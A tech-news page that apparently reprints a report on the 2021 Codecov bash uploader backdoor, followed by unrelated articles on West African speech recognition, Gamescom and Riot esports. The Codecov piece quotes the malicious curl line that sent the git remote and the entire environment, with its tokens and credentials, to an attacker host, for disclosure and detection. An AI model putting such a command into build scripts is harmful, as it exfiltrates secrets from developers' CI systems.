Connect with us

Tech

Backdoored developer tool that stole credentials escaped notice for 3 months

Published

on

Backdoored developer tool that stole credentials escaped notice for 3 months

Getty Images

A publicly available software development tool contained malicious code that stole the authentication credentials that apps need to access sensitive resources. It’s the latest revelation of a supply chain attack that has the potential to backdoor the networks of countless organizations.

The Codecov bash uploader contained the backdoor from late January to the beginning of April, developers of the tool said on Thursday. The backdoor caused developer computers to send secret authentication tokens and other sensitive data to a remote site controlled by the hackers. The uploader works with development platforms including Github Actions, CircleCI, and Bitrise Step, all of which support having such secret authentication tokens in the development environment.

A pile of AWS and other cloud credentials

The Codecov bash uploader performs what is known as code coverage for large-scale software development projects. It allows developers to send coverage reports that, among other things, determine how much of a codebase has been tested by internal test scripts. Some development projects integrate Codecov and similar third-party services into their platforms, where there is free access to sensitive credentials that can be used to steal or modify source code.

Code similar to this single line first appeared on January 31:

curl -sm 0.5 -d “$(git remote -v)<<<<<< ENV $(env)” https:///upload/v2 || true

The code sends both the GitHub repository location and the entire process environment to the remote site, which has been redacted because Codecov says it’s part of an ongoing federal investigation. These types of environments typically store tokens, credentials, and other secrets for software in Amazon Web Services or GitHub.

Armed with these secrets, there’s no shortage of malicious things an attacker could do to development environments that relied on the tool, said HD Moore, a security expert and the CEO of network discovery platform Rumble.

“It really depends on what was in the environment, but from the point that attackers had access (via the bash uploader), they might have been able to plant backdoors on the systems where it ran,” he wrote in a direct message with Ars. “For GitHub/CircleCI, this would have mostly exposed source code and credentials.”

Moore continued:

The attackers likely ended up with a pile of AWS and other cloud credentials in addition to tokens that could give them access to private repositories, which includes source code but also all the other stuff that the token was authorized for. On the extreme end, these credentials would be self-perpetuating—the attackers use a stolen GitHub token to backdoor the source code, which then steals downstream customer data, etc. The same could apply to AWS and other cloud credentials. If the credentials allowed for it, they could enable infrastructure takeover, database access, file access, etc.

In Thursday’s advisory, Codecov said the malicious version of the bash uploader could access:

  • Any credentials, tokens, or keys that our customers were passing through their CI (continuous integration) runner that would be accessible when the bash uploader script was executed
  • Any services, datastores, and application code that could be accessed with these credentials, tokens, or keys
  • The git remote information (URL of the origin repository) of repositories using the bash uploaders to upload coverage to Codecov in CI

“Based upon the forensic investigation results to date, it appears that there was periodic unauthorized access to a Google Cloud Storage (GCS) key beginning January 31, 2021, which allowed a malicious third-party to alter a version of our bash uploader script to potentially export information subject to continuous integration to a third-party server,” Codecov said. “Codecov secured and remediated the script April 1, 2021.”

The Codecov advisory said that a bug in Codecov’s Docker image-creation process allowed the hacker to extract the credential required to modify the bash uploader script.

The tampering was discovered on April 1 by a customer who noticed that the shasum that acts as a digital fingerprint to confirm the integrity of bash uploader didn’t match the shasum for the version downloaded from https://codecov.io/bash. The customer contacted Codecov, and the tool maker pulled the malicious version and started an investigation.

Codecov is urging anyone who used the bash updater during the affected period to revoke all credentials, tokens, or keys located in CI processes and create new ones. Developers can determine what keys and tokens are stored in a CI environment by running the env command in the CI Pipeline. Anything sensitive should be considered compromised.

Additionally, anyone who uses a locally stored version of the bash uploader should check it for the following:

Curl -sm 0.5 -d “$(git remote -v)

If this commands appear anywhere in a locally stored bash uploader, users should immediately replace the uploader with the most recent version from https://codecov.io/bash.

Codecov said that developers using a self-hosted version of bash update are unlikely to be affected. “To be impacted, your CI pipeline would need to be fetching the bash uploader from https://codecov.io/bash instead of from your self-hosted Codecov installation. You can verify from where you are fetching the bash uploader by looking at your CI pipeline configuration,” the company said.

The appeal of supply chain attacks

The compromise of Codecov’s software development and distribution system is the latest supply chain attack to come to light. In December, a similar compromise hit SolarWinds, the Austin, Texas maker of network management tools used by about 300,000 organizations around the world, including Fortune 500 companies and government agencies.

The hackers who carried out the breach then distributed a backdoored update that was downloaded by about 18,000 customers. About 10 US federal agencies and 100 private companies eventually received follow-on payloads that sent sensitive information to attacker-controlled servers. FireEye, Microsoft, Mimecast, and Malwarebytes were all swept up in the campaign.

More recently, hackers carried out a software supply chain attack that was used to install surveillance malware on the computers of people using NoxPlayer, a software package that emulates the Android operating system on PCs and Macs, mainly so users can play mobile games on those platforms. A backdoored version of NoxPlayer was available for five months, researchers from ESET said.

The appeal of supply chain attacks to hackers is their breadth and effectiveness. By compromising a single player high in the software supply, hackers can potentially infect any person or organization who uses the compromised product. Another feature that hackers find beneficial: there’s often little or nothing targets can do to detect malicious software distributed this way because digital signatures will indicate that it’s legitimate.

In the case of the backdoored bash update version, however, it would have been easy for Codecov or any of its customers to detect the malice by doing nothing more than checking the shasum. The ability for the malicious version to escape notice for three months indicates that no one bothered to perform this simple check.

People who have used the bash updater between January 31 and April 1 should carefully inspect their development builds for signs of compromise by following the steps outlined in Thursday’s advisory.

Continue Reading
Advertisement
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

Tech

Speech recognition system trains on radio archive to learn Niger Congo languages

Published

on

speech recognition

Join Transform 2021 this July 12-16. Register for the AI event of the year.


For many of the 700 million illiterate people around the world, speech recognition technology could provide a bridge to valuable information. Yet in many countries, these people tend to speak only languages for which the datasets necessary to train a speech recognition model are scarce. This data deficit persists for several reasons, chief among them the fact that creating products for languages spoken by smaller populations can be less profitable.

Nonprofit efforts are underway to close the gap, including 1000 Words in 1000 Languages, Mozilla’s Common Voice, and the Masakhane project, which seeks to translate African languages using neural machine translation. But this week, researchers at Guinea-based tech accelerator GNCode and Stanford detailed a new initiative that uniquely advocates using radio archives in developing speech systems for “low-resource” languages, particularly Maninka, Pular, and Susu in the Niger Congo family.

“People who speak Niger Congo languages have among the lowest literacy rates in the world, and illiteracy rates are especially pronounced for women,” the coauthors note. “Maninka, Pular, and Susu are spoken by a combined 10 million people, primarily in seven African countries, including six where the majority of the adult population is illiterate.”

The idea behind the new initiative is to make use of unsupervised speech representation learning, demonstrating that representations learned from radio programs can be leveraged for speech recognition. Where labeled datasets don’t exist, unsupervised learning can help to fill in domain knowledge by determining the correlations between data points and then training based on the newly applied data labels.

New datasets

The researchers created two datasets, West African Speech Recognition Corpus and the West African Radio Corpus, intended for applications targeting West African languages. The West African Speech Recognition Corpus contains over 10,000 hours of recorded speech in French, Maninka, Susu, and Pular from roughly 49 speakers, including Guinean first names and voice commands like “update that,” “delete that,” “yes,” and “no.” As for the West African Radio Corpus, it consists of 17,000 audio clips sampled from archives collected from six Guinean radio stations. The broadcasts in the West African Radio Corpus span news and shows in languages including French, Guerze, Koniaka, Kissi, Kono, Maninka, Mano, Pular, Susu, and Toma.

To create a speech recognition system, the researchers tapped Facebook’s wav2vec, an open source framework for unsupervised speech processing. Wav2vec uses an encoder module that takes raw audio and outputs speech representations, which are fed into a Transformer that ensures the representations capture whole-audio-sequence information. Created by Google researchers in 2017, the Transformer network architecture was initially intended as a way to improve machine translation. To this end, it uses attention functions instead of a recurrent neural network to predict what comes next in a sequence.

Above: The accuracies of WAwav2vec.

Despite the fact that the radio dataset includes phone calls as well as background and foreground music, static, and interference, the researchers managed to train a wav2vec model with the West African Radio Corpus, which they call WAwav2vec. In one experiment with speech across French, Maninka, Pular, and Susu, the coauthors say that they achieved multilingual speech recognition accuracy (88.01%) on par with Facebook’s baseline wav2vec model (88.79%) — despite the fact that the baseline model was trained on 960 hours of speech versus WAwav2vec’s 142 hours.

Virtual assistant

As a proof of concept, the researchers used WAwav2vec to create a prototype of a speech assistant. The assistant — which is available in open source along with the datasets — can recognize basic contact management commands (e.g., “search,” “add,” “update,” and “delete”) in addition to names and digits. As the coauthors note, smartphone access has exploded in the Global South, with an estimated 24.5 million smartphone owners in South Africa alone, according to Statista, making this sort of assistant likely to be useful.

“To the best of our knowledge, the multilingual speech recognition models we trained are the first-ever to recognize speech in Maninka, Pular, and Susu. We also showed how this model can power a voice interface for contact management,” the coauthors wrote. “Future work could expand its vocabulary to application domains such as microfinance, agriculture, or education. We also hope to expand its capabilities to more languages from the Niger-Congo family and beyond, so that literacy or ability to speak a foreign language are not prerequisites for accessing the benefits of technology. The abundance of radio data should make it straightforward to extend the encoder to other languages.”

VentureBeat

VentureBeat’s mission is to be a digital town square for technical decision-makers to gain knowledge about transformative technology and transact.

Our site delivers essential information on data technologies and strategies to guide you as you lead your organizations. We invite you to become a member of our community, to access:

  • up-to-date information on the subjects of interest to you
  • our newsletters
  • gated thought-leader content and discounted access to our prized events, such as Transform 2021: Learn More
  • networking features, and more

Become a member

Continue Reading

Tech

Gamescom announces online-only festival in August, reversing hybrid event plan

Published

on

The crowd at Gamescom 2019 on opening day on Tuesday, August 20.

Did you miss GamesBeat Summit 2021? Watch on-demand here! 


Reversing a plan announced in March, Gamescom will no longer try to do a hybrid gaming expo this summer. Instead, it will focus on an online-only event at the end of August.

The fan-and-business trade show is the world’s biggest game-industry event — with 370,000 people attending the physical event in 2019 — but it had to switch to online-only in 2020 due to the pandemic. The event organizers floated the idea of a hybrid physical event where fans could come see games in person along with digital announcements. The hope was that the coronavirus would subside thanks to vaccinations and that people would want to recapture the excitement of an in-person event.

But today, the Association of the German Games Industry and Koelnmesse decided against that plan, based on responses from potential exhibitors and fans. They plan to hold the main part of the show from August 25 to August 29.

Gamescom Congress will once again take place Thursday, August 26, and Devcom will start off the events August 23. The main days of Gamescom will take place on August 26 and August 27. IGN will produce a show dubbed Awesome Indies. Opening Night Live, which Geoff Keighley produces, will still take place, but it will now be online-only as well. Gamescom was planning to start selling tickets in May.

Above: The crowd at Gamescom 2019 on opening day. The show was online-only in 2020. It will be online-only again in 2021.

Image Credit: Dean Takahashi

“This decision was made after extensive discussions with partners and exhibitors,” the organizers said in a press release. “Thus, the organizers take into account the current situation, in which too many companies are unable to participate in physical events this year due to the still difficult development. In this way, they also meet the partners’ strong need for planning security. This means that Gamescom 2021 will be held exclusively digitally and free of charge for all Gamescom fans.”

Last year, Gamescom had more than 100 million video views over all formats and channels, more than 50 million unique viewers from 180 countries, and 370 partners from 44 countries. Oliver Frese, chief operating officer of Koelnmesse, said in a statement that Gamescom was coming too early for many companies in the industry, as it required so much advanced planning amid an uncertain environment. Companies need that planning reliability, he said.

Felix Falk, managing director of the German Games Industry Association, said in a statement that next year the groups will be able to implement more of the concepts they had in mind for a hybrid version of Gamescom. There will be business-to-business matchmaking events such as “indies meet investors and publishers” pitch events.

GamesBeat

GamesBeat’s creed when covering the game industry is “where passion meets business.” What does this mean? We want to tell you how the news matters to you — not just as a decision-maker at a game studio, but also as a fan of games. Whether you read our articles, listen to our podcasts, or watch our videos, GamesBeat will help you learn about the industry and enjoy engaging with it.

How will you do that? Membership includes access to:

  • Newsletters, such as DeanBeat
  • The wonderful, educational, and fun speakers at our events
  • Networking opportunities
  • Special members-only interviews, chats, and “open office” events with GamesBeat staff
  • Chatting with community members, GamesBeat staff, and other guests in our Discord
  • And maybe even a fun prize or two
  • Introductions to like-minded parties

Become a member

Continue Reading

Tech

Riot Games will launch Wild Rift esports tournament in late 2021

Published

on

Riot Games will launch Wild Rift esports tournament in late 2021

Did you miss GamesBeat Summit 2021? Watch on-demand here! 


Riot Games will launch the League of Legends: Wild Rift esports tournament in late 2021.

The company hopes to apply the lessons of a decade of League of Legends esports to the mobile game. Riot Games wants to build a similar community for Wild Rift. It made the announcement this morning on the eve of the League of Legends Mid-Season Invitational tournament.

League of Legends: Wild Rift is a 5-on-5 multiplayer online battle arena (MOBA) experience of League of Legends, developed for console and mobile by Riot Games. Wild Rift brings League to new platforms, featuring competitive gameplay, a twin-stick control system, and a roster of over 60 champions to take to the Rift, with two more coming every month this year.

John Needham, the global head of esports at Riot Games, said in a statement that Riot believes mobile gaming will transform the future of esports. The company didn’t specify whether the Wild Rift esports tournament would be an in-person or digital event.

Needham also noted that regional teams will qualify for this tournament in the fourth quarter of the year.

A worldwide competition

Above: The stage for the Riot Games esports event.

Image Credit: Riot Games

Regional Wild Rift Esports competitions have already started around the world. Southeast Asia recently concluded the first official esports competition, the SEA Icon Series: Preseason. The five week-long event took place in multiple locations: Vietnam, Taiwan, Philippines, Thailand, Indonesia, Malaysia, and Singapore and featured 54 professional teams.

Leo Faria is global head of Wild Rift esports. He said in a statement that a number of esports organizations have announced their Wild Rift teams. In Southeast Asia, organizations like The Alliance, RRQ, and LoL Esports veterans Flash Wolves all announced Wild Rift rosters. More big names are coming, he said.

Faria said that a regional competition schedule, third-party tournament guidelines, and more information about the global event will be revealed later this year.

Other big events

wild 3

Above: The Masters Trophy

Image Credit: Riot Games

Other events include the Valorant Stage 3 Masters event, which will increase in size with 16 teams in attendance. It will take place from September 9 to September 19. The winner of Masters: Berlin will automatically qualify into Valorant Champions where a single team will be crowned the best Valorant team of 2021. HyperX will sponsor that event as a keyboard and mouse partner. Other Riot partners include Spotify and Verizon. More than 2,000 teams have participated in qualifying events.

Cisco will be providing the network supporting MSI in Iceland and Riot Games’ production centers in Berlin and Los Angeles. For the first time, pro teams at MSI will be able to practice from the comfort of their hotel rooms on the same high-performance servers at ultra low ping.

Riot is also launching a new podcast that will be available exclusively on Spotify that will cover trending LoL Esports news from around the world. The episodes will be hosted by Riot Games personalities and will drop weekly throughout the year.

GamesBeat

GamesBeat’s creed when covering the game industry is “where passion meets business.” What does this mean? We want to tell you how the news matters to you — not just as a decision-maker at a game studio, but also as a fan of games. Whether you read our articles, listen to our podcasts, or watch our videos, GamesBeat will help you learn about the industry and enjoy engaging with it.

How will you do that? Membership includes access to:

  • Newsletters, such as DeanBeat
  • The wonderful, educational, and fun speakers at our events
  • Networking opportunities
  • Special members-only interviews, chats, and “open office” events with GamesBeat staff
  • Chatting with community members, GamesBeat staff, and other guests in our Discord
  • And maybe even a fun prize or two
  • Introductions to like-minded parties

Become a member

Continue Reading

Trending